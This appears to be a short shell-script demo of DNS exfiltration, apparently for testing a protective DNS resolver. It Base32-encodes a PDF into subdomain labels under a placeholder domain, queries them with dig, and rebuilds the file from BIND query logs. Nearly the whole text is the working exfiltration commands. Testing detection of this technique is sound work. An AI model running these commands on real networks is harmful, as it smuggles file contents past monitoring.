DNS Exfiltration Demo
Simple Exfiltration
Note that the BIND logs will be approximately 17 times the size of the transferred file.
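SOURCE=/home/name/dns_exfil_test/releasenotes.pdf
ENCRYPTED=/home/name/dns_exfil_test/encryptedpdf.txt
ENCRYPTED2=/home/name/dns_exfil_test/encryptedpdf2.txt
DOMAIN=domain.com
SUBDOM=asdf
LOCALDNS=protectivedns.example.com
BIND_LOG_FILE=/var/log/named/query.log
DECRYPTEDOUTPUT=/home/name/dns_exfil_test/releasenotes2.pdf
# Encode the source file as Base32. This is encoding, not encryption: the
# file content is fully recoverable by anyone who can read the resolver's
# query log, which is exactly what the log-parsing step later in the demo
# relies on. The Base32 stream is split into 32-character chunks (well under
# the 63-octet DNS label limit) and each chunk becomes a label under
# $SUBDOM.$DOMAIN, one fully-qualified name per line.
base32 -- "$SOURCE" | tr -d '\n' | fold -w 32 | sed -e "s/$/.$SUBDOM.$DOMAIN/" > "$ENCRYPTED"
# Resolve every name in the batch file through the resolver under test;
# dig's -f mode issues one query per line of the file.
dig +short A "@$LOCALDNS" -f "$ENCRYPTED"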
Or, alternatively:
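# Alternative to dig -f: read the batch file line by line and issue one query
# per name, one second apart. The `|| [[ -n ... ]]` keeps a final line that
# lacks a trailing newline.
while IFS= read -r name || [[ -n "$name" ]]; do
  dig +short A "@$LOCALDNS" "$name"
  sleep 1
done < "$ENCRYPTED"
# Recover the payload from the resolver's query log: keep only lines for the
# exfiltration domain (-F so the dots match literally), take the queried name
# field, and strip the "(" and "):" that BIND's query-log line wraps it in.
# NOTE(review): the field number ($8) and that punctuation depend on the BIND
# version and logging configuration -- confirm against a sample line of the
# actual log. If the log spans several runs, or queries were retried, the
# decode below will see duplicate or out-of-order chunks and produce a corrupt
# file; truncate or time-filter the log before a run.
grep -F -- "$SUBDOM.$DOMAIN" "$BIND_LOG_FILE" | awk '{print $8}' | sed -e 's/(//g' -e 's/)://g' > "$ENCRYPTED2"
# Rejoin the Base32 chunks and decode them back into the original bytes.
tr -d '\n' < "$ENCRYPTED2" | base32 --decode > "$DECRYPTEDOUTPUT"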
